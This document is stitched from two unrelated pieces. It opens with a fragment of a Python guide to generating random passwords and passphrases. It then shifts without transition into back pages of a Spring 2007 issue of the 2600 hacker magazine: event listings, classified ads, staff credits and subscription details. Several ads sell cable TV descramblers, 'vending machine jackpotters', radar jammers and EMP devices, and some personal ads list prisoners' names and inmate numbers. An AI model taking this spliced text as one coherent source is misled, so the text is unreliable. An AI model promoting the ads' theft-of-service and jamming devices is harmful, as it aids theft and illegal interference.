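    n = length_for(target_bits, len(alphabet))
    return "".join(secrets.choice(alphabet) for _ in range(n))


def random_passphrase(target_bits=80, words=WORDS, sep="-"):
    """The same guarantee built from words; a short list needs more of them."""
    n = length_for(target_bits, len(words))
    return sep.join(secrets.choice(words) for _ in range(n))
```

With the 94-character alphabet, 80 bits needs 13 characters; with a 7776-word diceware list it needs 7 words; with the eight-word toy list above it needs 27.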
HOPE FORUMS
Announcing a brand new way to communicate your thoughts and ideas about the HOPE conferences, 2600, and hacker issues!
Simply go to http://talk.hope.net and join the fun! We already have many lively discussions in progress and you can start your own if you feel the need. The forum focuses mainly on the past and future Hackers On Planet Earth conferences and the current battle to help save the Hotel Pennsylvania, site of HOPE.
Registration is simple, quick, and free! See what happens when we all put our heads together.
OFF THE HOOK
Wednesdays, 1900-2000 ET
WBAI 99.5 FM, New York City
WBCQ 7415 kHz - shortwave to North America
and at http://www.2600.com/offthehook over the net
Call us during the show at +1 212 209 2900.
Email oth@2600.com with your comments.
And yes, we are interested in simulcasting on other stations or via satellite. Contact us if you can help spread "Off The Hook" to more listeners!
Happenings
CAROLINACON will begin Friday, April 20th and wrap up Saturday night, April 21st. This year's event will be held at the Holiday Inn in scenic Chapel Hill, North Carolina (1301 N. Fordham Blvd.). The conference is a great way to meet other like-minded technology enthusiasts and to knowledge-share with your peers. There is a lot of opportunity for both learning and socializing. In many ways, Carolinacon is like a whole semester of college, all in one weekend. For more details, visit www.carolinacon.org.
CHAOS COMMUNICATION CAMP 2007. This event will start August 8th and last until August 12th, 2007. That's right, ladies and gentlemen, we are going for five days this time! The Camp will take place at a brand new location at the Airport Museum in Finowfurt, directly at Finow airport. So if you like, you can directly fly to the Camp. You can get to the location easily with a car in less than 30 minutes starting in Berlin and we will make sure there is a shuttle connection to the next train station. The coordinates of the location are 52.8317, 13.6779. More details at ccc.de.
HITBSECCONF - MALAYSIA is the premier network security event for the region and the largest gathering of hackers in Asia. Our 2007 event is expected to attract over 700 attendees from around the world and will see 4 keynote speakers in addition to 40 deep knowledge technical researchers. The conference takes place September 3rd through September 6th in Kuala Lumpur. The Call For Papers is open until May 1st. More details at http://conference.hitb.org/hitbsecconf2007kl/.
ILLUMINATING THE BLACK ART OF SECURITY. Announcing SecTor - Security Education Conference Toronto - November 20-21, 2007. Bringing to Canada the world's brightest (and darkest) minds together to identify, discuss, dissect, and debate the latest digital threats facing corporations today. Unique to central Canada, SecTor provides an unmatched opportunity for IT professionals to collaborate with their peers and learn from their mentors. All speakers are true security professionals with depth of understanding on topics that matter. Check us out at www.sector.ca to see the impressive growing list of speakers and be sure to sign up for email updates. Attendees and Sponsors - don't miss out, both are limited!
For Sale
VENDING MACHINE JACKPOTTERS. Go to www.hackershomepage.com for EMP Devices, Lock Picks, Radar Jammers & Controversial Hacking Manuals. 407-965-5500
MAKE YOUR SOFTWARE OR WEBSITE USER FRIENDLY with Foxee, the friendly and interactive cartoon blue fox! Not everyone who will navigate your website or software application will be an expert hacker, and some users will need a little help! Foxee is a hand animated Microsoft Agent character that will accept input through voice commands, text boxes, or a mouse, and interact with your users through text, animated gestures, and even digital speech to help guide them through your software with ease! Foxee supports 10 spoken languages and 31 written languages. She can be added to your software through C++, VB6, all .Net languages, VBScript, JavaScript, and many others! Natively compatible with Microsoft Internet Explorer and can work with Mozilla Firefox when used with a free plug-in. See a free demonstration and purchasing information at www.foxee.net!
TV-B-GONE. Turn off TVs in public places! Airports, restaurants, bars, anywhere there's a TV! See why everyone at HOPE Number Six loved it. Turning off TVs really is fun. $20.00 each. www.TVBGone.com
JUST RELEASED! Feeling tired during those late night hacking sessions? Need a boost? If you answered yes, then you need to reenergize with the totally new HackMusic Volume 1 CD. The CD is crammed with high energy hack music to get you back on track. Order today by sending your name, address, city, state, and zip along with $15 to: Doug Talley, 1234 Birchwood Drive, Monmouth, IL 61462. This CD was assembled solely for the readers of 2600 and is not available anywhere else!
NET DETECTIVE. Whether you're just curious, trying to locate or find out about people for personal or business reasons, or you're looking for people you've fallen out of touch with, Net Detective makes it all possible! Net Detective is used worldwide by private investigators and detectives, as well as everyday people who use it to find lost relatives, old high school and army buddies, deadbeat parents, lost loves, people that owe them money, and just plain old snooping around. Visit us today at www.netdetective.org.uk.
JEAH.NET SHELLS/HOSTING SINCE 1999. JEAH's FreeBSD shell accounts continue to be the choice for unbeatable uptime and the largest virtual host list you'll find anywhere. JEAH lets you transfer/store files, IRC, and email with complete privacy and security. Fast, stable virtual web hosting and completely anonymous domain registration solutions also available with JEAH. As always, mention 2600 and your setup fees are waived! Join the JEAH.NET institution!
NETWORKING AND SECURITY PRODUCTS available at OvationTechnology.com. We're a supplier of Network Security and Internet Privacy products. Our online store features VPN and firewall hardware, wireless hardware, cable and DSL modems/routers, IP access devices, VoIP products, parental control products, and ethernet switches. We pride ourselves on providing the highest level of technical expertise and customer satisfaction. Our commitment to you... No surprises! Buy with confidence! Security and Privacy is our business! Visit us at http://www.OvationTechnology.com/store.htm.
PHONE HOME. Tiny, sub-miniature, 7/10 ounce, programmable/reprogrammable touch-tone, multi-frequency (DTMF) dialer which can store up to 15 touch-tone digits. Unit is held against the telephone receiver's microphone for dialing. Press "HOME" to automatically dial the stored digits which can then be heard through the ultra miniature speaker. Ideal for E.T.'s, children, Alzheimer victims, lost dogs/chimps, significant others, hackers, and computer wizards. Give one to a boy/girl friend or to that potential "someone" you meet at a party, the supermarket, school, or the mall; with your pre-programmed telephone number, he/she will always be able to call you! Also, ideal if you don't want to "disclose" your telephone number but want someone to be able to call you locally or long distance by telephone. Key ring/clip. Limited quantity available. Money order only. $24.95 + $3.00 S/H. Mail order to: PHONE HOME, Nimrod Division, 331 N. New Ballas Road, Box 410802, CRC, Missouri 63141.
REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? Read the all-new Access All Areas, a guidebook to the art of urban exploration, from the author of Infiltration zine. Send $20 postpaid in the US or Canada, or $25 overseas, to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada, or order online at www.infiltration.org.
ENHANCE OR BUILD YOUR LIBRARY with any of the following CD ROMS: Hack Attacks Testing, Computer Forensics, Master Hacker, Web Spy 2001, Hackers' Handbook, Troubleshooting & Diagnostics 98, PC Troubleshooter 2000, Forbidden Subjects 3, Hackers Toolkit 2.0, Steal This CD, Hacks & Cracks, Hackerz Kronicklez, Elite Hackers Toolkit 1, Forbidden Knowledge 2, Troubleshooting & Diagnostics 2002, Police Call Frequency Guide 2nd Edition, Computer Toybox, Answering Machine 2000, Hackers Encyclopedia 3, Maximum Security 3rd Edition, Network Utilities 2001, Screensavers 2002, Engineering 2000, Anti Hacker Toolkit 2nd Edition & PC Hardware. Send name, address, city, state, zip, email address (for updates only) and items ordered, along with a cashier's check or money order in the amount of $20 for each item to: Doug Talley, 1234 Birchwood Drive, Monmouth, IL 61462.
FREEDOM DOWNTIME ON DVD! Years in the making but we hope it was worth the wait. A double DVD set that includes the two hour documentary, an in-depth interview with Kevin Mitnick, and nearly three hours of extra scenes, lost footage, and miscellaneous stuff. Plus captioning for 20 (that's right, 20) languages, commentary track, and a lot of things you'll just have to find for yourself! The entire two disc set can be had by sending $30 to Freedom Downtime DVD, PO Box 752, Middle Island, NY 11953 USA or by ordering from our online store at http://store.2600.com. (VHS copies of the film still available for $15.)
CAP'N CRUNCH WHISTLES. Brand new, only a few left. THE ORIGINAL WHISTLE in mint condition, never used. Join the elite few who own this treasure! Once they are gone, that is it - there are no more! Keychain hole for keyring. Identify yourself at meetings, etc. as a 2600 member by dangling your keychain and saying nothing. Cover one hole and get exactly 2600 hz, cover the other hole and get another frequency. Use both holes to call your dog or dolphin. Also, ideal for telephone remote control devices. Price includes mailing. $49.95. Not only a collector's item but a VERY USEFUL device to carry at all times. Cash or money order only. Mail to: WHISTLE, P.O. Box 11562-ST, Cit, Missouri 63105.
PHRAINE. The technology without the noise quarterly would like to thank the 2600 readers who have also become new subscribers and encourages those who have not ACK their need for diverse computer information in conjunction with that of 2600 to dedicate some packets and become a subscriber today! Visit us at our new domain www.pearlyfreepress.com/phraine.
JINX - HACKER CLOTHING/GEAR. Tired of being naked? JINX.com has 300+ T's, sweatshirts, stickers, and hats for those rare times that you need to leave your house. We've got swag for everyone, from the budding n00blet to the vintage geek. So take a five minute break from surfing pr0n and check out http://www.JINX.com. Uber-Secret-Special Mega Promo: Use "2600v3n02" and get 10% off of your order.
CABLE TV DESCRAMBLERS. New. Each $45 + $5.00 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system. Complete with 110vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable TV converter (i.e., Radio Shack) to be used with the unit. Cable connects to the converter, then the descrambler, then the output goes to TV set tuned to channel 3. CD 9621 Olive, Box 28992-TS, Olivette, Missouri 63132. Email cabledescramblerguy@yahoo.com.
Wanted
OPT DIVERT for 800 numbers desperately needed for privacy. I need a telephone number anywhere in the U.S. that will then give a dial tone from which one can dial a toll-free 800 number so that the toll-free number business recipient does not have the actual telephone number from which the call originates. AT&T used to work for this purpose but no longer does. Please email opt_divert@yahoo.com.
HELP! I want to set up a voice bridge chat line for hackers but need the software. Call me at (213) 595-8360 (Ben) or www.UndergroundClassifieds.com.
Services
HACKER TOOLS TREASURE BOX! You get over 630 links to key resources, plus our proven methods for rooting out the hard-to-find tools, instantly! Use these links and methods to build your own customized hacker (AHEM, network security) toolkit. http://wealthfunnel.com/securitybook
ADVANCED TECHNICAL SOLUTIONS. #422 - 1755 Robson Street, Vancouver, B.C. Canada V6G 3B7. Ph: (604) 928-0555. Electronic countermeasures - find out who is secretly videotaping you or bugging your car or office. State of the art detection equipment utilized.
FREERETIREDSTUFF.COM. Donate or request free outdated tech products - in exchange for some good karma - by keeping usable unwanted tech items out of your neighborhood landfill. The FREE and easy text and photo classified ad website is designed to find local people in your area willing to pick up your unwanted tech products or anything else you have to donate. Thank you for helping us spread the word about your new global recycling resource by distributing this ad to free classified advertising sites and newsgroups globally. www.FreeRetiredStuff.com FREE ADS are available for those trying to BUY or SELL tech products. Visit www.NoPayClassifieds.com.
SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY CALIFORNIA OR FEDERAL COURT? Consult with a semantic warrior committed to the liberation of information. I am an aggressive criminal defense lawyer specializing in the following types of cases: unauthorized access, theft of trade secrets, identity theft, and trademark and copyright infringement. Contact Omar Figueroa, Esq. at (415) 986-5591, at omar@stanfordalumni.org, or at 506 Broadway, San Francisco, CA 94133-4507. Graduate of Yale College and Stanford Law School. Complimentary case consultation for 2600 readers. All consultations are strictly confidential and protected by the attorney-client privilege.
INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is owned and operated by intelligent hackers. We believe every user has the right to online security and privacy. In today's hostile anti-hacker atmosphere, intelligent hackers require a secure place to work, compile, and explore without big brother looking over their shoulder. Hosted at Chicago Equinix with Juniper Filtered DoS Protection. Multiple FreeBSD servers at P4 2.4 GHz. Affordable pricing from $5/month with a money back guarantee. Lifetime 26% discount for 2600 readers. Coupon code: Save2600. http://www.reverse.net
ANTI-CENSORSHIP LINUX HOSTING. Kaleton Internet provides affordable web hosting, email accounts, and domain registrations based on dual processor P4 2.4 GHz Linux servers. Our hosting plans start from only $8.95 per month. This includes support for Python, Perl, PHP, MySQL, and more. You can now choose between the USA, Singapore, and other offshore locations to avoid censorship and guarantee free speech. We respect your privacy. Payment can be by E-Gold, PayPal, credit card, bank transfer, or Western Union. See www.kaleton.com for details.
ARE YOU TIRED of receiving piles of credit card offers and other postal spam? You can't just throw them in the trash or recycle them as someone could get a hold of them and use them to steal your identity. You can't just let them pile up on your kitchen table. So instead you have to be bothered with shredding and disposing of them. Well, not anymore. OperationMailBack.com has a free solution for you. All costs of disposal including delivery will be paid by the company responsible for sending the stuff to you. Stop wasting your valuable time dealing with messes other people are responsible for creating. Check out our newly redesigned website for complete information and take back your mailbox.
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RELATED CRIME? Have an idea, invention, or business you want to buy, sell, protect, or market? Wish your attorney actually understood you when you speak? The Law Office of Michael B. Green, Esq. is the solution to your 21st century legal problems. Former SysOp and member of many private BBS's since 1981 now available to directly represent you or bridge the communications gap and assist your current legal counsel. Extremely detailed knowledge regarding criminal and civil liability for computer and technology related actions (18 U.S.C. 1028, 1029, 1030, 1031, 1341, 1342, 1343, 2511, 2512, ECPA, DMCA, 1996 Telecom Act, etc.), domain name disputes, intellectual property matters such as copyrights, trademarks, licenses, and acquisitions as well as general business and corporate law. Over eleven years experience as in-house legal counsel to a computer consulting business as well as an over 20 year background in computer, telecommunications, and technology matters. Published law review articles, contributed to nationally published books, and submitted briefs to the United States Supreme Court on Internet and technology related issues. Admitted to the U.S. Supreme Court, 2nd Circuit Court of Appeals, and all New York State courts and familiar with other jurisdictions as well. Many attorneys will take your case without any consideration of our culture and will see you merely as a source of fees or worse, with ill-conceived prejudices. My office understands our culture, is sympathetic to your situation, and will treat you with the respect and understanding you deserve. No fee for the initial and confidential consultation and, if for any reason we cannot help you, we will even try to find someone else who can at no charge. So you have nothing to lose and perhaps everything to gain by contacting us first. Visit us at: http://www.computorney.com or call 516-9WE-HELP (516-993-4357).
Announcements
OFF THE HOOK is the weekly one hour hacker radio show presented Wednesday nights at 7:00 pm ET on WBAI 99.5 FM in New York City. You can also tune in over the net at www.2600.com/offthehook or on shortwave in North and South America at 7415 kHz. Archives of all shows dating back to 1988 can be found at the 2600 site, now in mp3 format! Shows from 1988-2005 are now available in DVD-R format for $30! Or subscribe to the new high quality audio service for only $50. Each month you'll get a newly released year of Off The Hook in broadcast quality (far better than previous online releases). Send check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or order through our online store at http://store.2600.com. Your feedback on the program is always welcome at oth@2600.com.
INFOSEC NEWS is a privately run, medium traffic list that caters to the distribution of information security news articles. These articles come from such sources as newspapers, magazines, and online resources. For more information, check out: http://www.infosecnews.org.
PHONE PHUN. http://phonephun.us. Blog devoted to interesting phone numbers. Share your finds!
CHRISTIAN HACKERS' ASSOCIATION: Check out the web page http://www.christianhacker.org for details. We exist to promote a community for Christian hackers to discuss and impact the realm where faith and technology intersect for the purpose of seeing lives changed by God's grace through faith in Jesus.
Personals
PLEASE WRITE ME. WM blue eyes brown hair, 6'3", 195 lbs., 28 years old (send a pic, I will do the same). I'm incarcerated for drug manufacturing. Been down 1 year, got 1 or 3 more to go. I'm looking for anyone to talk to about real world hacking, IDs, or any 2600 related stuff. I love to write and have nothing but time. Meclynn Stuver GN-1141, P.O. Box 1000, Houtzdale, PA 16698-1000.
PRISONER SEEKS FRIENDS to help with book review lookups on Amazon by keywords. Com Sci major, thirsty to catch up to the real world before my reentry. I have my own funds to buy books. I only need reviews. I'm MUD/MMORPG savvy in C++/Python/PHP/MySQL. I've moved. Please resend. Ken Roberts J60962, 450-1-28M, PO Box 9, Avenal, CA 93204.
SEEKING NON-STAGNANT MINDS for mutual illumination/exchange of thoughts and ideas. Three years left on my sentence and even with all my coaching the walls still can't carry a decent conversation. Interests include cryptography, security, conspiracy theories, martial arts, and anything computer related. All letters replied to. Max Rider, SBI #00383681 D.C.C., 1181 Paddock Rd., Smyrna, DE 19977.
IN SEARCH OF FRIENDS/CONTACTS: Railroaded by lying, evidence-burying FBI agents and U.S. Postal Inspectors for a crime I didn't commit. In court I had a snowball's chance in hell. Unless I outsmart the government by exhuming the exculpatory treasure trove of my innocence, I'm hopelessly dungeoned for the duration. There's only a little gleam of time between two eternities. I refuse to return to forever without a fight. Will answer all. W. Wentworth Foster #21181, Southeast Correction Center, 300 East Pedro Simmons Drive, Charleston, MO 63834.
OFFLINE OUTLAW IN TEXAS is looking for any Unix/Linux books I can get my hands on. Also very interested in privacy in all areas. If you can point me in the right direction or feel like teaching an old dog some new tricks, drop me a line. I'll answer all letters. Props to those who already have, you know who you are. William Lindley 822934, 1300 FM 655, Rosharon, TX 77583-8604.
IN SEARCH OF NEW CONTACTS every day. I have a lot of time to pass and am always up for a good discussion. Joint source audit anyone? Of course it'll have to be on paper. Interests not limited to: low-level OS coding, embedded systems, crypto, radiotelecom, and conspiracy theory. Will reply to all. Brian Salcedo #32130-039, FCI McKean, P.O. Box 8000, Bradford, PA 16701.
ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying to take out an ad unless you subscribe! All ads are free and there is no amount of money we will accept for a non-subscriber ad. We hope that's clear. Of course, we reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world. We make no guarantee as to the honesty, righteousness, sanity, etc. of the people advertising here. Contact them at your peril. All submissions are for ONE ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. Don't expect us to run more than one ad for you in a single issue either. Include your address label/envelope or a photocopy so we know you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953. Deadline for Summer issue: 6/1/07.
Spring 2007 Page 63
Answer choice for Winter 2006 puzzle:
"The east codes-west codes NPA rivalry takes its toll."
STAFF

Editor-In-Chief: Emmanuel Goldstein
Layout and Design: ShapeShifter
Cover: Dabu Ch'wald
Office Manager: Tampruf
Writers: Bernie S, Billsf, Bland Inquisitor, Eric Corley, Dragorn, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, The Prophet, Redbird, David Ruderman, Screamer Chaotix, Sephail, Seraf, Silent Switchman, StankDawg, Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: css
Quality Degradation: mlc
Broadcast Coordinators: Juintz, thai
IRC Admins: koz, sj, beave, carton, r0d3nt, shardy
Forum Admin: Skram
Inspirational Music: Queen, Anti Nowhere League, James Brown, Eurythmics, Buffalo Springfield, Glenn Miller, Asobi Seksu
Shout Outs: mrq, John Harlacher, Eyebeam

2600 (ISSN 0749-3851, USPS 003-176), Spring 2007, Volume 24 Issue , is published quarterly by 2600 Enterprises Inc., 2 Flowerfield, St. James, NY 11780. Periodical postage rates paid at St. James, NY and additional mailing offices. Subscription rates in the U.S. $20 for one year.
POSTMASTER: Send address changes to 2600, P.O. Box 752, Middle Island, NY 11953-0752.
Copyright (c) 2007 2600 Enterprises Inc.

YEARLY SUBSCRIPTION:
U.S. and Canada - $20 individual, $50 corporate (U.S. Funds)
Overseas - $30 individual, $65 corporate
Back issues available for 1984-2006 at $20 per year, $26 per year overseas
Individual issues available from 1988 on at $5.00 each, $6.50 each overseas

ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 USA (subs@2600.com)
FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 USA (letters@2600.com, articles@2600.com)
2600 Office Line: +1 631 751 2600
2600 Fax Line: +1 631 474 2677
2600 Meetings

[Meeting listings by country, state, and city; the entries are illegible in this scan.]

All meetings take place on the first Friday of the month. Unless otherwise noted, they start at 5 pm local time. To start a meeting in your city, send email to meetings@2600.com.